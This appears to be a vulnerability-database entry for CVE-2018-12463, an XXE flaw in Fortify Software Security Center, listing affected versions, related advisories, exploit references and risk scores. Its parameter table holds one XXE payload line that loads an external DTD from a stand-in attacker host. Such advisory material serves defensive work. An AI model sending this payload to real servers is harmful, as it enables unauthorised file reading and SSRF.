Lucene search

CVE-2018-12463

🗓️ 12 Jul 2018 16:05:29Reported by microfocusType

cve🔗 web.nvd.nist.gov👁 54 Views🌐 WEB

An XXE vulnerability in Fortify SSC allows remote unauthenticated users to read arbitrary files or conduct SSRF attacks via crafted XML requests

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Reporter	Title	Published	Views	Family All 9
Packet Storm	Fortify SSC 17.10 / 17.20 / 18.10 XXE Injection	13 Jul 201800:00	–	packetstorm
Prion	Server side request forgery (ssrf)	12 Jul 201816:29	–	prion
Exploit DB	Fortify Software Security Center (SSC) 17.x/18.1 - XML External Entity Injection	16 Jul 201800:00	–	exploitdb
exploitpack	Fortify Software Security Center (SSC) 17.x18.1 - XML External Entity Injection	16 Jul 201800:00	–	exploitpack
Check Point Advisories	Fortify Software Security Center Command Injection (CVE-2018-12463)	7 Oct 202000:00	–	checkpoint_advisories
0day.today	Fortify Software Security Center (SSC) 17.x/18.1 - XML External Entity Injection Vulnerability	16 Jul 201800:00	–	zdt
Cvelist	CVE-2018-12463 MFSBGN03811 rev.1 - Fortify Software Security Center (SSC), Multiple vulnerabilities	12 Jul 201816:00	–	cvelist
NVD	CVE-2018-12463	12 Jul 201816:29	–	nvd
Ivan 'd0znpp' Novikov	A4: XML External Entities (XXE) ❗️ — Top 10 OWASP 2017	14 Sep 202113:09	–	d0znpp

Nvd

Node

hp fortify_software_security_centerMatch17.1

hp fortify_software_security_centerMatch17.2

hp fortify_software_security_centerMatch18.1

[
  {
    "product": "Fortify Software Security Center",
    "vendor": "Micro Focus",
    "versions": [
      {
        "status": "affected",
        "version": "17.1, 17.2, 18.1"
      }
    ]
  }
]

Source	Link
securitytracker	www.securitytracker.com/id/1041286
softwaresupport	www.softwaresupport.softwaregrp.com/document/-/facetsearch/document/KM03201563
exploit-db	www.exploit-db.com/exploits/45027/

Parameter	Position	Path	Description	CWE
<?xml version='1.0' encoding='UTF-8'?>	request body	/ssc/fm-ws/services	An XML external entity (XXE) vulnerability allowing remote unauthenticated users to read arbitrary files or conduct SSRF attacks.	CWE-611
<!DOCTYPE data SYSTEM 'http://intruder.ip.here/alex1.dtd'>	request body	/ssc/fm-ws/services	An XML external entity (XXE) vulnerability allowing remote unauthenticated users to read arbitrary files or conduct SSRF attacks.	CWE-611

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

12 Jul 2018 16:29Current

8.2High risk

Vulners AI Score8.2

CVSS27.5

CVSS37.3 - 9.8

EPSS0.19331

CWE-611